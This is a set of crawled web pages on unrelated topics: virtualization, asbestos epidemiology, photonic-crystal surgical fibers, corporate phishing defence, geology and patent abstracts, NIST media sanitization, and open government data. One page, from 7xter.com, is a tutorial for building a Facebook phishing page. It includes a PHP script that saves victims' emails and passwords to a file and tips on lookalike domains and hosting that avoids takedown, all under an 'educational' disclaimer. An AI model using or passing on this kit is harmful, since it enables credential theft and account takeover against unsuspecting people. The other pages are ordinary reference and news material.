http://www.applicure.com/solutions/prevent-cross-site-scripting-attacks
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171053.19/warc/CC-MAIN-20170219104611-00579-ip-10-171-10-108.ec2.internal.warc.gz
en
0.940567
1,073
2.8125
3
Virtualization has been a major data center trend for a number of years, being driven by companies’ desire for greater operating efficiency, lower capital costs, better use of existing floor and rack space, and reduced energy consumption. The heart of virtualization is the hypervisor or virtualization layer, which hides the server hardware and presents a “generalized” environment in which processes can run. These processes, or virtual machines, can be anything from single applications to entire operating systems. A number of benefits accrue from virtualization; one of the key features underlying these benefits is that the hypervisor presents a common platform to virtual machines regardless of the underlying hardware. Thus, the virtual machines need not be tailored to a variety of different servers, storage systems and so on—instead, they need only operate using the common virtualized environment. This characteristic enables, for instance, easy portability of virtual machines among different hardware systems (as long as those systems run the same hypervisor). Furthermore, backup (or, more particularly, restoration) is simplified because of the single, unifying virtualization layer. In addition, this approach allows multiple virtual machines to run on a single server while maintaining isolation. Instead of dedicating an entire server to a single process—a configuration that, according to some estimates, yields hardware utilization rates below just 10% in some data centers—servers can ran as many processes as necessary to increase utilization while still dedicating sufficient resources to each process. Naturally, over time virtual machine technology has expanded and improved, encompassing more features and capabilities in critical areas such as, for security, security and operating isolation. Here’s a snapshot of the current state of virtual machines, as well as where they may be headed in coming years.
<urn:uuid:7f093983-6ea6-4f1a-aaf8-d872a0a77634>
CC-MAIN-2017-09
http://www.datacenterjournal.com/virtual-machine-technology/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172831.37/warc/CC-MAIN-20170219104612-00631-ip-10-171-10-108.ec2.internal.warc.gz
en
0.919218
358
2.765625
3
Marinaccio A.,Unit of Occupational and Environmental Epidemiology | Binazzi A.,Unit of Occupational and Environmental Epidemiology | Bonafede M.,Unit of Occupational and Environmental Epidemiology | Corfiati M.,Unit of Occupational and Environmental Epidemiology | And 74 more authors. Occupational and Environmental Medicine | Year: 2015 Introduction Italy produced and imported a large amount of raw asbestos, up to the ban in 1992, with a peak in the period between 1976 and 1980 at about 160 000 tons/year. The National Register of Mesotheliomas (ReNaM, "Registro Nazionale dei Mesoteliomi" in Italian), a surveillance system of mesothelioma incidence, has been active since 2002, operating through a regional structure. Methods The Operating Regional Center (COR) actively researches cases and defines asbestos exposure on the basis of national guidelines. Diagnostic, demographic and exposure characteristics of non-occupationally exposed cases are analysed and described with respect to occupationally exposed cases. Results Standardised incidence rates for pleural mesothelioma in 2008 were 3.84 (per 100 000) for men and 1.45 for women, respectively. Among the 15 845 mesothelioma cases registered between 1993 and 2008, exposure to asbestos fibres was investigated for 12 065 individuals (76.1%), identifying 530 (4.4%) with familial exposure (they lived with an occupationally exposed cohabitant), 514 (4.3%) with environmental exposure to asbestos (they lived near sources of asbestos pollution and were never occupationally exposed) and 188 (1.6%) exposed through hobby-related or other leisure activities. Clusters of cases due to environmental exposure are mainly related to the presence of asbestos-cement industry plants (Casale Monferrato, Broni, Bari), to shipbuilding and repair activities (Monfalcone, Trieste, La Spezia, Genova) and soil contamination (Biancavilla in Sicily). Conclusions Asbestos pollution outside the workplace contributes significantly to the burden of asbestos-related diseases, suggesting the need to prevent exposures and to discuss how to deal with compensation rights for malignant mesothelioma cases induced by nonoccupational exposure to asbestos. Source Corfiati M.,Epidemiology Unit | Scarselli A.,Epidemiology Unit | Binazzi A.,Epidemiology Unit | Di Marzio D.,Epidemiology Unit | And 75 more authors. BMC Cancer | Year: 2015 Background: Previous ecological spatial studies of malignant mesothelioma cases, mostly based on mortality data, lack reliable data on individual exposure to asbestos, thus failing to assess the contribution of different occupational and environmental sources in the determination of risk excess in specific areas. This study aims to identify territorial clusters of malignant mesothelioma through a Bayesian spatial analysis and to characterize them by the integrated use of asbestos exposure information retrieved from the Italian national mesothelioma registry (ReNaM). Methods: In the period 1993 to 2008, 15,322 incident cases of all-site malignant mesothelioma were recorded and 11,852 occupational, residential and familial histories were obtained by individual interviews. Observed cases were assigned to the municipality of residence at the time of diagnosis and compared to those expected based on the age-specific rates of the respective geographical area. A spatial cluster analysis was performed for each area applying a Bayesian hierarchical model. Information about modalities and economic sectors of asbestos exposure was analyzed for each cluster. Results: Thirty-two clusters of malignant mesothelioma were identified and characterized using the exposure data. Asbestos cement manufacturing industries and shipbuilding and repair facilities represented the main sources of asbestos exposure, but a major contribution to asbestos exposure was also provided by sectors with no direct use of asbestos, such as non-asbestos textile industries, metal engineering and construction. A high proportion of cases with environmental exposure was found in clusters where asbestos cement plants were located or a natural source of asbestos (or asbestos-like) fibers was identifiable. Differences in type and sources of exposure can also explain the varying percentage of cases occurring in women among clusters. Conclusions: Our study demonstrates shared exposure patterns in territorial clusters of malignant mesothelioma due to single or multiple industrial sources, with major implications for public health policies, health surveillance, compensation procedures and site remediation programs. © 2015 Corfiati et al.; licensee BioMed Central. Source
<urn:uuid:c6f59fb9-53ee-44fd-8464-fd3d6d18fbba>
CC-MAIN-2017-09
https://www.linknovate.com/affiliation/cor-lazio-998855/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174215.11/warc/CC-MAIN-20170219104614-00155-ip-10-171-10-108.ec2.internal.warc.gz
en
0.909872
941
2.546875
3
Modeling of photonic crystals at NSF supercomputing centers, now partners in the TeraGrid, over several years has led the way to a major advance in laser surgery, exemplifying how computational simulations no longer take a back seat in driving scientific discovery. In November 2004, a woman in North Carolina with potentially suffocating growths in her larynx and trachea had them removed by a high-power laser — and went home the same day. This condition had never before been treated without anesthesia and operating-room surgery. Six years earlier, physicists at MIT used supercomputers to learn something no one knew about mirrors. These two seemingly separate events indeed are linked. A new laser technology, developed from a startling insight into the physics of light, may have saved the woman's life and, at the least, promises huge savings in the treatment of her disease — recurrent respiratory papillomatosis — one that affects tens of thousands of people in the United States alone. It's a success, furthermore, that exemplifies how supercomputing is no longer merely a supporting character, but with increasing frequency plays a lead role in scientific discovery. In 1998, John Joannopoulos and his team of researchers at MIT discovered what has come to be called a “perfect mirror.” Their “eureka!” moment came not in the laboratory or with pencil and paper working out of mathematical theory; it happened because a computational model produced results no one expected. For the past decade, Joannopoulos and his team have pushed forward new understanding of “photonic crystals” — fascinating materials, crafted from layers of silicon, which have unprecedented ability to trap, guide and control light. While he works closely with a laboratory team, headed by MIT professor Yoel Fink, to fabricate these challenging materials, a key to this work driving forward has been computational simulations that predict — successfully and precisely — how photonic crystals will work in advance of actually making them. “Computation,” said Joannopoulos, “has played a dominant role in the study of photonic crystals.” The Perfect Mirror It may be the most significant advance in mirror technology, said the New York Times, since Narcissus fell in love with his own image in a pool of water. The perfect mirror is so called because it reflects light at any angle with virtually no loss of energy. As a result, it makes possible a number of applications in optical technology, the most significant to date being flexible optical fiber that can transmit the high-powered CO2 lasers used in endoscopic surgery. Until Joannopoulos' team's 1998 finding, reported with a paper in Science, mirrors were understood to come in two basic flavors, both with inherent limitations. Everyone who looks in the bathroom mirror for signs of life in the morning knows about metallic mirrors. They work all too well for seeing your own face, but they don't work to make optical fiber because a large portion of the light leaks away, absorbed by the metal, rather than reflected. For optical fiber and other applications where energy loss matters, the choice has been mirrors made from dielectrics — materials that don't conduct electricity well. Dielectrics generally don't reflect light well either, but scientists have found ways to alternate thin dielectric layers of different reflective properties to achieve reflection without energy loss. The drawback has been that these dielectric mirrors reflect light only from certain angles, and their application depends on being able to use light at a limited range of angles and frequencies. This limitation was thought to be a law of nature, like gravity – no way to get around it — until 1998, when Joannopoulos and company noticed anomalous results from a computational model of a photonic crystal mirror they were running at the San Diego Supercomputer Center. The light seemed to reflect at a much larger angle than was thought possible. “We saw some interesting results in the computation,” he said. “Then came the theory to explain the computation, and then came a real experiment making something like this and testing it.” The result: a multi-layered dielectric mirror that reflects light from all angles without energy loss. Within a few years, the perfect mirror proved to be the solution for delivering a high-powered laser via flexible optical fiber. Open Wide for a High-Power Laser Fiber optics to transmit visible light, based on conventional dielectric mirror technology, has been around for years. These silica-based fibers have a light-carrying core with an index-of-refraction higher than the surrounding material. This layered approach traps light within the inner core — called “total internal reflection.” It works well for visible light, but high-power lasers — such as CO2 lasers used in endoscopic surgery — will melt conventional optical fiber. Joannopoulos and Fink realized that the perfect mirror offered a potential solution for high-power transmission. With further computations and pioneering laboratory work, the team developed a hollow-core fiber — essentially a dielectric perfect mirror rolled up into a tube — designed in such a way, based on photonics, to transmit high-power lasers. To take this idea beyond the laboratory into useful applications, in 2000, Joannopoulos and Fink helped form OmniGuide Communications, a company dedicated to developing and marketing the new hollow-core fiber. Further computations over the next few years — in San Diego, Illinois and Pittsburgh — explored other fundamental issues and phenomena of this new class of cylindrical photonic-crystal fiber. In endoscopic surgery, the lack of a fiber for high-power transmission has meant that the laser had to be delivered to a patient via an apparatus with an articulated arm and large handpiece — which has precluded using these precise lasers for many minimally invasive procedures. For this reason, the surgery to treat RRP required dislocating the patient's jaw and general anesthesia, so that the laser could be brought close enough to the affected area. A test case for OmniGuide's hollow-core fiber presented itself last year. In serious cases of RRP, the surgery often must be repeated to keep the breathing passage open. Dr. Jamie Koufman, director of the Center for Voice and Swallowing Disorders of Wake Forest University Baptist Medical Center, had a woman RRP patient who had undergone several previous RRP surgeries, but once again had developed near-total obstruction of the larynx and trachea. Koufman obtained FDA approval to use the prototype fiber. She used a numbing topical spray in the throat and trachea, requiring no anesthesia, and with a CO2 laser delivered via an OmniGuide fiber cleared the RRP growths. The patient, who went home that day, is doing fine. “Unsedated, laryngeal laser surgery with the OmniGuide fiber is a dream come true for me as an endoscopic surgeon,” said Koufman. “The patient loved it because it was easy for her.” Typical cost of RRP operating-room surgery with general anesthesia is $25,000. With expected FDA approval, the new procedure promises large cost savings nationally. “These novel optical fibers, based on photonic crystals offer a new approach for medical lasers, making it possible to guide a CO2 laser beam, which can cut tissue with high precision, into a patient's body through a very small incision,” said Joannopoulos. “It will likely prove itself useful for many procedures.” Computational science has come a long way over the past 20 years,” he added. “Even well known equations can have remarkable unexpected consequences that we would never learn about without these powerful computational engines, such as LeMieux (PSC's terascale system). This is just one advance that highlights how these machines are invaluable tools of discovery.” Michael Schneider is a senior science writer at the Pittsburgh Supercomputing Center.
<urn:uuid:25a26aed-4fec-4434-b8b9-905d0f7e4788>
CC-MAIN-2017-09
https://www.hpcwire.com/2005/09/01/healing_light-1/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170600.29/warc/CC-MAIN-20170219104610-00575-ip-10-171-10-108.ec2.internal.warc.gz
en
0.949788
1,649
3
3
Most people have heard of phishing and have an intuitive grasp of what it means. Images come to mind of bright shiny lures tempting hapless fish into taking a bite of something that will cause their demise. Indeed, this concept holds true whether you’re a rainbow trout or run-of-the-mill worker idly surfing the web at your desk. But unlike fishing in the traditional sense, with its watchful serenity or – to some – unrelenting tedium, what does phishing entail in the virtual world of hackers, malware and data loss? Phishing scams usually involve fraudulent emails from cybercriminals pretending to be someone else in order to steal money, information, or a person’s identity. These emails are especially harmful to businesses, where a single employee can accidently open the wrong email and bring a whole company to its knees. Phishing scams have been around for a while, but people still fall for them all the time. A recent study found that, on average, people open one in every three phishing emails, with the FBI noting that such scams resulted in a loss of $3.1 billion dollars worldwide. With the recent rise of malicious software (aka malware) such as ransomware, phishing e-mails have become more harmful than ever before. Hackers Get Creative There’s an impressive array of phishing scams out there, angling to snag unwary users. Here are some common types to watch for: - Spear Phishing refers to emails that trick individuals into performing an action (like clicking bad links and downloading infected attachments) or giving out personal information (like banking information and passwords). Hackers will use social media posts to see where victims have been, where they’re going, and what they recently bought. For example, if hackers see a tweet that you recently purchased a new iPhone on Amazon, they might send you an email like this, urging you to click on a link. Once you click, you’re directed to a legitimate-looking webpage that requests updated credit card information—which goes straight to hackers. - Soft Targeting refers to emails that target large groups of people who all share an attribute, like the same job title. By using vague language, the scammers can successfully target different people using the same email. One popular soft targeting scam involves sending HR departments fake resumes infected with ransomware. As shown on the image below, attachments are often sent as a .zip file, which can hide all sorts of malicious files inside. When employees open the resume, the ransomware infects the computer instantly, putting valuable information and entire businesses at risk. - Whaling refers to scams that target senior executives who likely have access to large amounts of money. Before attacking, hackers may comb through social media posts to learn the names of key executives, payment schedules, and anything else that will help their emails look convincing. Last year, a Mattel finance executive was the target of a whaling scam when she received an email from the new CEO, requesting a large amount of money. The executive sent off $3 Million dollars, only to realize her mistake a few days later. Mattel eventually got its money back, but only because of a banking holiday. An Ounce of Prevention Although there’s no way to eliminate all threats, there are several simple techniques you can adopt to prevent a phishing attack or mitigate one after it happens. - Educate Users: Educating users about safe browsing practices, the consequence of malware infection, and the latest threats is an important first step. It can also help to involve different departments in addition to IT. To supplement user education, many companies run mock phishing exercises, where IT sends out emails that simulate popular phishing scams, and gather information on employee behavior and compliance. Such testing helps companies understand if employees are disregarding guidelines and putting the company at risk. - Create Unique Passwords: An estimated 63% of data breaches involve overly simplistic passwords or those reused by people for their different accounts. While it may be difficult for users to remember several complex passwords, creating distinct passwords for every account makes things more difficult for hackers as well. - Flag Outside Emails: Scammers often use emails that look similar to a company’s email address in order to trick employees into thinking the email sender is a coworker. For this reason, it’s important to flag all emails that come from outside the company so employees can think twice before clicking links or sending money. - Limit User Privileges: Because workers with administrative privileges often have access to important data, their a favorite target of hackers. Limiting the number of people with such privileges makes it more difficult for hackers to succeed. - Disable Java and Macros: Malware is routinely delivered through exploited Microsoft Office documents and Java scripts, both of which can circumvent anti-virus programs. To address this, IT should replace Java and Macro Scripts with much safer programs. - Back Up Data: Because prevention doesn’t always work, a solid backup plan is essential. In particular, it’s a good idea to keep several copies of backup files in different locations and formats since the more backups you have, the easier it will be to recover your data. And since hackers are learning how to infect backup data, it’s important to have as many different backups as possible. That way, if your system becomes infected with malware, all you have to do is wipe it clean and reconnect to your backups. Backing up data and systems to the cloud or using a dedicated collocated backup server provides access to built-in firewalls and other useful security measures. Malware systems can’t keep up with ransomware’s frantic permutations designed to sidestep detection. Additionally, paying ransomware doesn’t mean you’ll absolutely get your data back, key corruption and other issues can arise that permanently lock you out of your data and could force the business, depending on its size into failure. It takes a two-phase approach, leveraging detection technologies and backup to be better protected. The cloud benefit is that the cloud isn’t on-premise and depending on how the vendor has designed their architecture can be impervious to being infected by such a virus. This is an advantage of being cloud-native vs. being retrofitted to the cloud. When someone falls victim to a phishing scam, they should immediately disconnect any infected computers from the Internet to avoid any further infection or data loss. It’s also important to contact your local FBI field office and file a complaint with the IC3 at www.IC3.gov. True, you may not be able to undo a phishing scam. However, if you’ve backed up everything across your enterprise, you can survive the ordeal with your assets intact and nothing more than a few scrapes and bruises to show for it. To learn more about how to minimize the impact of malware with backup, download our Insider’s Guide.
<urn:uuid:d6072027-9908-4ac9-afdf-78d5d2b40dfe>
CC-MAIN-2017-09
https://www.druva.com/blog/feeling-like-fish-water-get-skinny-phishing-learn-protect-business/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171070.80/warc/CC-MAIN-20170219104611-00275-ip-10-171-10-108.ec2.internal.warc.gz
en
0.93743
1,439
3.078125
3
Villagomez D.,University of Geneva | Villagomez D.,Analysis Inc. | Spikings R.,University of Geneva Lithos | Year: 2013 New thermochronological data record a complex cooling history in the Central and Western Cordilleras of Colombia that is a function of Early Cretaceous to late Miocene tectonic events. Alkali-feldspar 40Ar/39Ar cooling ages of ~138-130Ma immediately post-date the cessation of Jurassic arc-magmatism and a major unconformity within the retro-foreland region of the northern Andes. We interpret these ages as cooling driven by exhumation in response to either compression driven by subduction of a seamount, or extension and oceanward migration of the slab during the earliest Cretaceous, giving rise to the Lower Cretaceous Quebradagrande arc sequence. Biotite and alkali-feldspar 40Ar/39Ar data from the palaeocontinental margin reveal the presence of a younger cooling event at 117-107Ma, which was contemporaneous with hornblende 40Ar/39Ar cooling ages obtained from medium-high P-T metamorphic relicts of a Late Jurassic-Early Cretaceous subduction channel. This cooling event is attributed to exhumation driven by the collision and accretion of a fringing arc against the continental margin, and obduction of the subduction channel onto the forearc. Inverse modelling of zircon and apatite fission track and (U-Th)/He data from throughout the Central and Western Cordilleras reveals three periods of rapid cooling since the Late Cretaceous. The earliest phase is recorded by Jurassic and Cretaceous granitoids that cooled rapidly during 75-65Ma. We attribute cooling to exhumation of the continental margin during ~75-70Ma (~1.6km/My), which was forced by the collision and accretion of the Caribbean Large Igneous Province in the Campanian. The Central Cordillera exhumed at moderate rates of ~0.3km/My during ~45-30Ma, which are also observed over widely dispersed regions along the Andean chain, and were probably caused by an increase in continent-ocean plate convergence rates. Exhumation rates drastically increased in the middle-late Miocene, with the greatest amount occurring in southern Colombia as a consequence of the collision and subduction of the buoyant Carnegie Ridge at 15Ma. © 2013 Elsevier B.V.. Source Analysis Inc. | Date: 2010-11-09 An active air heater is constructed to produce heat and to transfer heat to an air flow for heating a building. The active air heater comprises spaced apart fins; adjacent elements between the fins; and an electrical source directing an electrical current through the fins and the adjacent elements for heating the fins and the adjacent elements and the air flowing through the air flow passageways formed by the adjacent elements. The adjacent elements are porous, semi-conductor material having a roughness in its surfaces for enhancing the convective heat transfer between the material and the air flow. The active air heater may be rectangular or cylindrical. The porous, semi-conductor material includes carbon foams, ceramic foams, high temperature polymer foams, and low conductance alloy foams and the aforementioned materials in nano-material format. Analysis Inc. | Date: 2013-06-28 A simple and compact apparatus, and a method, for determining the characteristics of a number of fluids used in the truck and automotive industries including coolant, bio-diesel, gas-ethanol and diesel engine fluid (DEF). The apparatus includes a sample container providing optical paths of different lengths for making measurements on a sample. The dual path length design allows the apparatus to capture both NIR and UV spectral ranges. The qualitative and quantitative properties of the fluid under test are compared to test results under normal conditions or to the properties of unused fluid. Two light sources are used within a spectrometer with each source being associated with a different optical path length. National Health Research Institute and Analysis Inc. | Date: 2012-07-09 A specimen kit having a tiny chamber is disclosed for a specimen preparation for TEM. The space height of the chamber is far smaller than dimensions of blood cells and therefore is adapted to sort nanoparticles from the blood cells. The specimen prepared under this invention is suitable for TEM observation over a true distribution status of nanoparticles in blood. The extremely tiny space height in Z direction eliminates the possibility of aggregation of the nanoparticles and/or agglomeration in Z direction during drying; therefore, a specimen prepared under this invention is suitable for TEM observation over the dispersion and/or agglomeration of nanoparticles in a blood. Analysis Inc. | Date: 2010-10-20 Moving object detecting, tracking, and displaying systems are provided. Systems illustratively include a graphical user interface and a processing unit. The processing unit is a functional part of the system that executes computer readable instructions to generate the graphical user interface. The graphical user interface may include an alert and tracking window that has a first dimension that corresponds to a temporal domain and a second dimension that corresponds to a spatial domain. In some embodiments, alert and tracking windows include target tracking markers. Target tracking markers optionally provide information about moving objects such as, but not limited to, information about past locations of moving objects and information about sizes of moving objects. Certain embodiments may also include other features such as zoom windows, playback controls, and graphical imagery added to a display to highlight moving objects.
<urn:uuid:a8549808-5e62-4669-b5ab-c0bbec43f742>
CC-MAIN-2017-09
https://www.linknovate.com/affiliation/analysis-inc-299386/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171070.80/warc/CC-MAIN-20170219104611-00275-ip-10-171-10-108.ec2.internal.warc.gz
en
0.900679
1,157
2.53125
3
Handling the tail end of the IT life cycle Hints from NIST - By William Jackson - Apr 27, 2007 The National Institute of Standards and Technology has some advice for agencies getting rid of digital storage media: Shred. Disintegrate. Pulverize. Incinerate. Melt. These are ways to get rid of disks, tapes and other devices for which the ultimate sanction ' disposal with extreme prejudice ' has been decreed. NIST Special Publication 800-88, 'Guidelines for Media Sanitization,' lays out the accepted methods for ensuring that sensitive data is not compromised when information technology systems are retired or otherwise eliminated. Getting rid of electronic data can be difficult, and the amount of effort you should expend to do it depends on the type of information and what you plan to do with the computer, disk or hard drive when you are finished with it. Destroying disks, hard drives and other hardware is the most effective way to protect data, but NIST warns federal law requires that 'whenever possible, excess equipment and media should be made available to schools and nonprofit organizations.' So some risk assessment is required. NIST defines four levels of sanitization: - Disposal. The simplest methods, it involves just throwing the media away. It is obviously for the least-sensitive data. - Clearing. This makes data unretrievable by 'a robust keyboard attack,' which includes the use of recovery utilities. Overwriting is an acceptable means of clearing for undamaged media. - Purging. A higher level that resists data recovery by sophisticated laboratory attacks. Degaussing is effective for purging, but it cannot be used on nonmagnetic storage, such as CDs and DVDs. The firmware Secure Erase capability in Advanced Technology Attachment hard drives is an overwriting technique that satisfies both Clear and Purge requirements. - Destroying. What NIST calls the 'ultimate form of sanitization.' Paper and flexible media such as tapes and floppy disks can be shredded. But incineration, pulverization, disintegration or melting are required for more robust hardware. This often must be done at a specialized outside facility that can perform the work effectively and safely. The first step in selecting the appropriate level and method of sanitization is to categorize the sensitivity of the data using FIPS 199, 'Standards for Security Categorization of Federal Information and Information Systems.' NIST lays out the decision-making process for each category in SP 800-88. Generally, media with low-sensitivity data can be simply cleared if the agency is going to retain the device but should be purged if the device is leaving the agency's control. For moderate and highly sensitive data, media should be destroyed if it is not being reused. Media with highly sensitive data can be purged if the agency is retaining the device. If the data is only moderately sensitive the device can be cleared if it will be retained, but must be purged if it is leaving the agency's control. William Jackson is a Maryland-based freelance writer.
<urn:uuid:d263d541-0434-4248-9d9f-3bd54c75116c>
CC-MAIN-2017-09
https://gcn.com/articles/2007/04/27/handling-the-tail-end-of-the-it-life-cycle.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173405.40/warc/CC-MAIN-20170219104613-00327-ip-10-171-10-108.ec2.internal.warc.gz
en
0.911074
636
2.671875
3
First of all, let me tell you one thing. This article is written only for educating people about how phishing works and how should they prevent phishing scams. Please don’t use these techniques for malicious purposes. What is Phishing? Phishing is a most popular technique used for hacking passwords and stealing sensitive information like credit cards, banking username & passwords etc. Phishing aka fishing attack is a process of creating a duplicate copy or a clone of a reputed website in the intention of stealing user’s password or other sensitive information like credit card details. It is easy for anyone who is having little technical knowledge to get a phishing page done and that is why this method is so popular. Phishing scams prompts users to enter sensitive details at a fake webpage (phishing page) whose look and feel are very identical to legitmate webpages. In most cases, the only difference is URL. URL can also be spoofed in some cases if the legitmate website is vulnerable. It is difficult for a commoner to identify the phishing scams page because of its trustworthy layout. How phishing works? Hackers / Attackers target general public and send them phishing links through email or personal message where the victim is prompted to click on a link in the email. The user / victim will get navigated to a Phishing page that pretends to be legit. Common people who don’t find that phishing page suspicious are induced to enter their sensitive information and all the information would get sent to the hacker / attacker. Lets take Facebook as an example, Creating a page which perfectly looks like Facebook login page but putting it in a different URL like fakebook.com or faecbook.com or any URL which pretends to be legit. When a user lands on such page, he/she might think that is real Facebook login page and asking them to provide their username and password. So the people who don’t find the fake login page suspicious might enter their username, password and the password information would be sent to the hacker/attacker who created it, simultaneously the victim would get redirected to original Facebook page. Real Life Example : John is a programmer, he creates a Facebook login page with some scripts to enable him to get the username and password information and put it in https://www.facebouk.com/make-money-online-tricks. Peter is a friend of John. John sends a message to Peter “Hey Peter, I found a way to make money online easily you should definitely take a look at this https://www.facebouk.com/make-money-online-tricks”. Peter navigate to the link and see a Facebook login page. As usual Peter enters his username and password of Facebook. Now the username and password of Peter is sent to John and Peter get redirected to a money making tips page https://www.facebouk.com/make-money-online-tricks-tips.html. That’s all Peter’s Facebook account is hacked. Read unbiased SEMrush Review How to create a Phishing page in minutes? We are going to take Facebook phishing page as an example. - Go to Facebook.com, make sure you are not logged in to Facebook. - Press Ctrl + U to view source code. - Copy the source code and paste it in a notepad. - Find the action attribute of the login form in the code. Search for keyword “action” without quotes by pressing Ctrl + F in notepad. In Facebook login page, action attribute was filled with Facebook login process url, replace it with process.php - You have to find name of input fields using inspect element (Ctrl + Shft + I in Chrome), in our case it is email and pass - Save this file as index.html - Now you have to get username and password stored in a text file named phishing.txt - Create a file named process.php using the following code. if(isset($_POST[’email’]) && isset($_POST[‘pass’])) $phishing = fopen(“phishing.txt”,”w”); fwrite($phishing,$password.”Email : “.$_POST[’email’].” , Password”.$_POST[‘pass’].”\n”); How to host phishing page in a URL? To put phishing page in a URL, you need to have two things. - Web Hosting Get a Free Domain You can create a free domain at Bluehost if you pay for their hosting plans. Once you create a domain, you need to get hosting and setup name servers for it. If you select bluehost you don’t need to setup name servers since it will already be set. Get Web Hosting Almost all free hosting panels would block phishing pages. So you need to get any paid shared hosting package, it would cost around $4 USD per month. I prefer bluehost for their excellent service and performance. Get bluehost shared hosting and free domain now. Once you setup domain and hosting, you can upload the files using FTP software. That’s all you can test it now. How could you protect yourself from phishing scams? Hackers can reach you in many ways like email, personal messages, Facebook messages, Website ads etc. Clicking any links from these messages would lead you to a login page. Whenever you find a email that navigates you to a webpage, you should note only one thing which is URL because nobody can spoof URL except when there is any XSS zero day vulnerability. What is the URL you see in browser address bar? Is that really https://www.LEGITWEBSITE.com? Is there any Green colour secure symbol (HTTPS) provided in the address bar? You can prevent hacking by remembering these questions. Also see the below examples of Facebook phishing pages. Perfect Phishing Pages Most of the people won’t suspect this page (snapshot given above) since there is https prefix with green colour secure icon and no mistake in www.facebook.com. But this is a phishing page how? Note the URL correctly. It is https://www.facebook.com.infoknown.com so www.facebook.com is a subdomain of infoknown.com. Google Chrome don’t differentiate the sub-domain and domain unlike Firefox do. SSL Certificates (HTTPS) can be obtained from many vendors, few vendors give SSL Certificate for Free for 1 year. Its not a big deal for a novice to create a perfect phishing page like this. So be aware of it. This is a normal Facebook Phishing page with some modification in the word Facebook. Phishing scams are attempts by scammers / hackers / cybercriminals to trick you to enter your sensitive infomation like internet banking username & passwords, credit card details etc. As described above, phishing scams focuses on retrieving monetary details indirectly. Most of the time phishing scams happens through email. Hackers spoof the email address of any legitmate website or authority to send phishing scam email, so the users are convinced to believe that the email is sent from a legit website. Email address can be easily spoofed using email headers. Server scripting languages like php helps a commoner to spoof from email address easily. Popuplar email services like gmail are smart enough to identify phishing email and route it to spam folder. But still there are some ways for a hacker to send phishing emails.
<urn:uuid:59ad1152-5139-445f-b46b-aa24b2de52fa>
CC-MAIN-2017-09
https://www.7xter.com/2016/08/phishing.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173405.40/warc/CC-MAIN-20170219104613-00327-ip-10-171-10-108.ec2.internal.warc.gz
en
0.882675
1,607
2.953125
3
A brief history of open data - By Luke Fretwell - Jun 09, 2014 In December 2007, 30 open-data pioneers gathered in Sebastopol, Calif., and penned a set of eight open-government data principles that inaugurated a new era of democratic innovation and economic opportunity. "The objective…was to find a simple way to express values that a bunch of us think are pretty common, and these are values about how the government could make its data available in a way that enables a wider range of people to help make the government function better," Harvard Law School Professor Larry Lessig said. "That means more transparency in what the government is doing and more opportunity for people to leverage government data to produce insights or other great business models." The eight simple principles -- that data should be complete, primary, timely, accessible, machine-processable, nondiscriminatory, nonproprietary and license-free -- still serve as the foundation for what has become a burgeoning open-data movement. In the seven years since those principles were released, governments around the world have adopted open-data initiatives and launched platforms that empower researchers, journalists and entrepreneurs to mine this new raw material and its potential to uncover new discoveries and opportunities. Open data has drawn civic hacker enthusiasts around the world, fueling hackathons, challenges, apps contests, barcamps and "datapaloozas" focused on issues as varied as health, energy, finance, transportation and municipal innovation. In the United States, the federal government initiated the beginnings of a wide-scale open-data agenda on President Barack Obama's first day in office in January 2009, when he issued his memorandum on transparency and open government, which declared that "openness will strengthen our democracy and promote efficiency and effectiveness in government." The president gave federal agencies three months to provide input into an open-government directive that would eventually outline what each agency planned to do with respect to civic transparency, collaboration and participation, including specific objectives related to releasing data to the public. In May of that year, Data.gov launched with just 47 datasets and a vision to "increase public access to high-value, machine-readable datasets generated by the executive branch of the federal government." When the White House issued the final draft of its federal Open Government Directive later that year, the U.S. open-government data movement got its first tangible marching orders, including a 45-day deadline to open previously unreleased data to the public. Now five years after its launch, Data.gov boasts more than 100,000 datasets from 227 local, state and federal agencies and organizations. "In May 2009, Data.gov was an experiment," Data.gov Evangelist Jeanne Holm wrote last month to mark the anniversary. "There were questions: Would people use the data? Would agencies share the data? And would it make a difference? We've all come a long way to answering those questions." The Obama administration continues to iterate and deepen its open-data efforts, most recently via a May 2013 executive order titled "Making Open and Machine-Readable the New Default for Government Information" and a supplementary Office of Management and Budget memo under the subject line of "Open Data Policy: Managing Information as an Asset," which created a framework to "help institutionalize the principles of effective information management at each stage of the information's life cycle to promote interoperability and openness." The directive also established the creation of Project Open Data, managed jointly by OMB and the Office of Science and Technology Policy. The centralized portal seeks to foster "a culture change in government where we embrace collaboration and where anyone can help us make open data work better," U.S. Chief Technology Officer Todd Park and CIO Steven VanRoekel wrote in May 2013 to announce the effort. Fully hosted on the social coding platform GitHub, Project Open Data offers tools, resources and case studies that can be used and enhanced by the community. Resources include an implementation guide, data catalog requirements, guidance for making a business case for open data, common core metadata schema, a sample chief data officer position description and more. Staying true to the spirit of openness As governments begin to implement open-data policies, following a flexible, iterative methodology is essential to the true spirit of openness. Through this process, Open Knowledge -- an international nonprofit organization devoted to "using advocacy, technology and training to unlock information" -- recommends keeping it simple by releasing "easy" data that will be a "catalyst for larger behavioral change within organizations," engaging early and actively, and immediately addressing any fear or misunderstanding that might arise during the process. Open Knowledge suggests four "simple" steps in the open-data implementation process: - Choose your dataset(s). - Apply an open license. - Make the data available. - Make it discoverable. From a more granular agency perspective, Project Open Data offers the following protocol: - Create and maintain an enterprise data inventory. - Create and maintain a public data listing. - Create a process to engage with customers to help facilitate and prioritize data release. - Document if data cannot be released. - Clarify roles and responsibilities for promoting efficient and effective data release. Furthermore, the technical fundamentals of open data include using machine-readable, open file formats such as XML, HTML, JSON, RDF or plain text -- as opposed to the pervasive, proprietary Portable Document Format created by Adobe. Former Philadelphia Chief Data Officer Mark Headd famously said, "When you put a PDF in your [GitHub] repo, an angel cries." Put a license on it Although government content is not subject to domestic copyright protection, it is important to put an open license on government data so that there is no confusion about how or whether it can be repurposed and distributed. In general, there are two options that meet the open definitions for licensing public data: public domain and share-alike. Much like the original eight open-government principles established in 2007, Open Knowledge outlines 11 conditions that 